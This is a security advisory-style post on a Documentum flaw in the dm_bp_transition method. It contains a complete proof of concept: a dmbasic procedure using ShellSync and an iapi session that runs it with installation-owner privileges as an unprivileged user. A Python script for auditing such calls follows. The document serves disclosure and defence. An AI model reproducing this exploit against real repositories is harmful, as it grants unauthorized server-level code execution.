documentum security vulnerabilities: dm_bp_transition method

Documentum has two implementations of lifecycle transitions:

  • dmbasic
  • java

The first one is implemented by the dm_bp_transition method:

API> retrieve,c,dm_method where object_name='dm_bp_transition'
...
1001ffd780000176
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : dm_bp_transition
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition
  method_args                   []: <none>
  launch_direct                   : T
  launch_async                    : F
  trace_launch                    : F
  run_as_server                   : T

This method accepts the following parameters:

Sub BP_Transition(_
    docbase_name$,_
    server_config_name$,_
    user_name$,_
    user_ticket$,_
    sysID$,_
    policyID$,_
    aliasID$,_
    userEntryID$,_
    actionID$,_
    userActionID$,_
    userPostprocID$,_
    targetState$,_
    targetStateNo$,_
    resumeStateNo$,_
    run_entry$,_
    run_actions$,_
    commitFlag$,_
    attachFlag$,_
    login_as$,_
    orig_sessionID$)

The most interesting parameters are user_name$, which is used to construct the repository session:

  buff = "connect," & docbase_name & "." & server_config_name _
         & "," & user_name & "," & user_ticket
  sess = dmAPIGet(buff)

  If sess = "" Then
    dmExit(CONNECTION_ERROR)
  End If

and userPostprocID$, which is used to run a custom dmbasic procedure:

  If (result = True And commitFlag = "T") Then
    If (debug = True) Then
      PrintToLog sess, "Commit the changes."
    End If
    result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo, resumeStateNo, attachFlag)
    If (result = True) Then
      If (debug = True) Then
        PrintToLog sess, "Run post action."
      End If
      result = RunProcedure(userPostprocID, 4, sess, sysID,_
                            user_name, targetState)
    End If
  Else

Such an implementation allows any user to write their own dmbasic procedure and run it with installation owner privileges. Example:

$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
$ cat > test.ebs  
Public Function EntryCriteria(ByVal SessionId As String, 
                              ByVal ObjectId As String, 
                              ByVal UserName As String, 
                              ByVal TargetState As String, 
                              ByRef ErrorString As String
                ) As Boolean  
  t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")  
  EntryCriteria=True  
End Function  
$ iapi  
Please enter a docbase name (docubase): repo  
Please enter a user (dmadmin): unprivileged_user  
Please enter password for unprivileged_user:  
  
  
        EMC Documentum iapi - Interactive API interface  
        (c) Copyright EMC Corp., 1992 - 2011  
        All rights reserved.  
        Client Library Release 6.7.1000.0027  
  
  
Connecting to Server using docbase repo  
[DM_SESSION_I_SESSION_START]info:  "Session 0101d920800b1a37 
       started for user unprivileged_user."  
  
  
Connected to Documentum Server running Release 6.7.1090.0170  Linux.Oracle  
Session id is s0  
API> create,c,dm_procedure  
...  
0801d920804e5416  
API> set,c,l,object_name  
SET> test  
...  
OK  
API> setfile,c,l,test.ebs,crtext  
...  
OK  
API> save,c,l  
...  
OK  
API> ?,c,execute do_method with method='dm_bp_transition', 
         arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 
                    0000000000000000 0801d920804e5416 0000000000000000 0000000000000000 
                    0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000
         '  
(1 row affected)  
  
API> Bye  
$ cat /tmp/test  
dm_bp_transition_has_vulnerability

This vulnerability was reported as CS-44439 (Security vulnerability with dm_bp_transition.ebs – shell injection)
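As an added defensive example (not part of the original post and not Documentum code), the following Python maps a do_method arguments string onto the BP_Transition parameter list above and flags what an auditor reviewing such a call would want to see: a user_name$ or login_as$ that differs from the account that issued the call, and any procedure-id parameter that is not the null id. Note that in the iapi session above the created dm_procedure id (0801d920804e5416) sits in the userEntryID$ slot rather than userPostprocID$, so all three procedure-id parameters are checked; the pairing of a session user with the arguments string is constructed here and assumed to come from whatever audit source is available.

```python
import shlex  # the do_method arguments string uses shell-style quoting ("" = empty)

# Parameter order of Sub BP_Transition, as listed in dm_bp_transition.ebs above.
BP_TRANSITION_PARAMS = (
    "docbase_name", "server_config_name", "user_name", "user_ticket",
    "sysID", "policyID", "aliasID", "userEntryID", "actionID",
    "userActionID", "userPostprocID", "targetState", "targetStateNo",
    "resumeStateNo", "run_entry", "run_actions", "commitFlag",
    "attachFlag", "login_as", "orig_sessionID",
)
# Parameters naming a dm_procedure that the method will execute as the server user.
PROCEDURE_PARAMS = ("userEntryID", "userActionID", "userPostprocID")
NULL_ID = "0000000000000000"


def parse_bp_transition_args(arguments: str) -> dict:
    """Split a do_method 'arguments' string and map it onto BP_Transition's parameters."""
    tokens = shlex.split(arguments)
    if len(tokens) != len(BP_TRANSITION_PARAMS):
        raise ValueError(f"expected {len(BP_TRANSITION_PARAMS)} arguments, got {len(tokens)}")
    return dict(zip(BP_TRANSITION_PARAMS, tokens))


def review_invocation(session_user: str, arguments: str) -> list:
    """Return (kind, parameter, value) findings for one dm_bp_transition call.

    session_user is the account that issued 'execute do_method'. The method
    connects as args['user_name'], so a mismatch means the caller is
    running the transition under another identity.
    """
    args = parse_bp_transition_args(arguments)
    findings = []
    for name in ("user_name", "login_as"):
        if args[name] != session_user:
            findings.append(("identity_mismatch", name, args[name]))
    for name in PROCEDURE_PARAMS:
        if args[name] != NULL_ID:
            findings.append(("procedure_supplied", name, args[name]))
    return findings


# Constructed sample: the call from the iapi session above, issued by
# unprivileged_user (the account in the DM_SESSION_I_SESSION_START line).
SAMPLE_SESSION_USER = "unprivileged_user"
SAMPLE_ARGUMENTS = (
    'repo repo dmadmin "" 0000000000000000 0000000000000000 '
    '0000000000000000 0801d920804e5416 0000000000000000 0000000000000000 '
    '0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
)
```

Run against the sample, review_invocation reports two identity mismatches (user_name$ and login_as$ are dmadmin while the session belongs to unprivileged_user) and the user-supplied userEntryID$.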
